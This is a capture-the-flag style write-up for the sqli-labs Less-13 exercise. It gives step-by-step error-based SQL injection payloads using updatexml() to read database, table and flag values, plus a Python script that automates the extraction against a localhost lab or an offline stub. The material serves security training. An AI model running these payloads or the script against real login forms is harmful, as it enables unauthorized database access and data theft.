Less-13
Less-13 POST - Double Injection - Single quotes- String -twist (POST single-quote variant, error-based "double" injection)
1. Check whether the parameter is injectable
uname=a'&passwd=a&submit=Submit
MySQL error message is echoed => injectable
2. Determine the parameter type
uname=1 or 1=1#&passwd=a&submit=Submit
No error, login simply fails (the whole value is treated as one string)
uname=1' or 1=1#&passwd=a&submit=Submit
Error echoed => string type; the error text also shows how the query quotes the value, which tells you what to close in the next step
3. Close the original quoting
uname=1') or 1=1#&passwd=a&submit=Submit
Login succeeds (the # comments out the password check, so only the boolean matters)
uname=1') or 1=2#&passwd=a&submit=Submit
Login fails => closing with ') is correct
4. Find how many columns the back-end query selects
uname=1') order by 2#&passwd=a&submit=Submit
No error
uname=1') order by 3#&passwd=a&submit=Submit
Error echoed => 2 columns
Note: this page never displays query results, only a login success/failure image, so UNION SELECT cannot return data here; the remaining steps use error-based injection through updatexml() instead.
5. Use error-based injection to read the current database name
uname=1') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=a&submit=Submit
The name comes back inside the XPATH syntax error message; updatexml() shows at most 32 characters of the bad XPath string, so long values have to be read in pieces with substr().
6. List the tables in the current database
uname=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=a&submit=Submit
If the group_concat() result is longer than 32 characters it is cut off; wrap it in substr() and shift the offset to see the rest.
7. Read the flag column from table sPI5qPTd
(The column name is found the same way, from information_schema.columns with table_name='sPI5qPTd'.)
uname=1') and updatexml(1,concat(0x7e,(select flag from sPI5qPTd limit 3,1),0x7e),1) #&passwd=a&submit=Submit
limit 3,1 returns the fourth row; updatexml() only reports one row per request, so change the offset to read the others.
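The procedure above, automated. This is an added example and not code from the original write-up or from sqli-labs itself; it assumes the lab is at http://localhost/sqli-labs/Less-13/ (TARGET, adjust to your setup), that the form fields are uname/passwd/submit as in the payloads above, and that MySQL's error text is reflected into the page. It goes one step beyond the notes by sliding a substr() window so that values longer than updatexml()'s 32-character limit are read in full. The offline stand-in fake_send and the values in FAKE_DB are constructed for this example so the script runs without a target.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Assumption: where the lab is running; change to match your setup.
TARGET = "http://localhost/sqli-labs/Less-13/"

# updatexml() reports at most 32 characters of the bad XPath string, so each
# request sends a 1-char marker (0x7e = '~') plus a 31-char window of the value.
CHUNK = 31
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(expr: str, offset: int) -> str:
    """uname value that leaks one 31-char window of the result of expr.

    expr is a SQL expression such as "select database()"; offset is 1-based,
    as in MySQL's substr(). The leading "1')" closes the bracketed single
    quotes found in steps 2 and 3, and "#" comments out the rest of the query.
    """
    return ("1') and updatexml(1,concat(0x7e,substr(({expr}),{off},{n})),1)#"
            .format(expr=expr, off=offset, n=CHUNK))


def extract_chunk(html: str) -> Optional[str]:
    """Pull the reflected window out of MySQL's XPATH error message.

    Returns None when no error was reflected (e.g. the page just said the
    login failed), which the caller treats as end of data.
    """
    m = ERROR_RE.search(html)
    return m.group(1) if m else None


def dump(expr: str, send: Callable[[str], str]) -> str:
    """Read the full result of expr by sliding the substr() window.

    send() takes a uname value and returns the response body; pass post_uname
    for a live target or fake_send to try the logic offline.
    """
    out, offset = "", 1
    while True:
        chunk = extract_chunk(send(build_payload(expr, offset)))
        if not chunk:           # no error reflected, or an empty window
            break
        out += chunk
        if len(chunk) < CHUNK:  # short window means we reached the end
            break
        offset += CHUNK
    return out


def post_uname(uname: str) -> str:
    """Live transport: POST the form exactly as the notes do."""
    body = urllib.parse.urlencode(
        {"uname": uname, "passwd": "a", "submit": "Submit"}).encode()
    with urllib.request.urlopen(TARGET, body, timeout=10) as resp:
        return resp.read().decode(errors="replace")


# Offline stand-in for the target. The values are constructed for this
# example; only the error-message format mimics what MySQL really returns.
FAKE_DB = {
    "select database()": "security",
    "select group_concat(table_name) from information_schema.tables "
    "where table_schema=database()": "emails,referers,uagents,users,sPI5qPTd",
}
PAYLOAD_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)\),1\)#$")


def fake_send(uname: str) -> str:
    """Apply substr() to a canned value and reflect the XPATH error."""
    m = PAYLOAD_RE.search(uname)
    if not m or m.group(1) not in FAKE_DB:
        return "<html>login failed</html>"
    expr, off, n = m.group(1), int(m.group(2)), int(m.group(3))
    return "XPATH syntax error: '~%s'" % FAKE_DB[expr][off - 1:off - 1 + n]


if __name__ == "__main__":
    # Run offline first; swap fake_send for post_uname against a real lab.
    print(dump("select database()", fake_send))
    print(dump("select group_concat(table_name) from information_schema.tables "
               "where table_schema=database()", fake_send))
```

Only the leading 0x7e marker is kept in the payload so that the full 31 characters after it fit inside the 32-character limit; the trailing 0x7e used in the notes would otherwise eat one character of every window. If a value itself contains a single quote the regex stops early, so for such data switch ERROR_RE to a looser pattern or hex-encode the result in SQL.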